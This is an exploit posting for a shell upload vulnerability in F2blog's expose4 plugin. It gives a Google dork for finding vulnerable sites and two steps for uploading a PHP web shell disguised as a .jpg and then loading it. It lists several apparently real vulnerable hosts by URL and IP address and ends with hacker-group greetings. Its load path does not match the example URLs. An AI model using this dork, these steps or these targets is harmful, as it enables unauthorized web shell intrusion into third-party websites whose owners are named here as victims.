F2blog suffers from a shell upload vulnerability.
3b1f10882bb049e0f5c63bdc6ff4ae280a1de98097ff9908017c8b912c2f8520
####################################################
#
# Name: f2blog Remote File Uploader (RFU) Sh3ll
#
#
# Google Dork: inurl:/plugins/expose4/uploadimg.php
#
#
# Type: PhP
#
#
# Author: MR.XpR
#
#
# Tested On: Linux Backtrack
#
#####################################################
1.Upload shell -----> Sh3ll.php.jpg
2.load shell -------> http://[patch]/components/com_expose/expose/img/shell.php.jpg
Expamle :
http://163.32.160.242/f2blog/plugins/expose4/uploadimg.php
http://www.hsubox.comeze.com/blog/plugins/expose4/uploadimg.php
http://163.32.69.239/kcvs021/plugins/expose4/uploadimg.php
http://deborahliu.idv.tw/blog/plugins/expose4/uploadimg.php
http://120.115.24.7:8080/blog/counsel/plugins/expose4/uploadimg.php
http://163.32.215.11/local/f2blog/plugins/expose4/uploadimg.php
http://120.115.24.7:8080/blog/counsel/plugins/expose4/uploadimg.php
Load shell :
http://[patch]/components/com_expose/expose/img/shell.php.jpg
Tnx To All IRaNiaN HAckers | IRaNHacK.ORG
Persian Gulf For Ever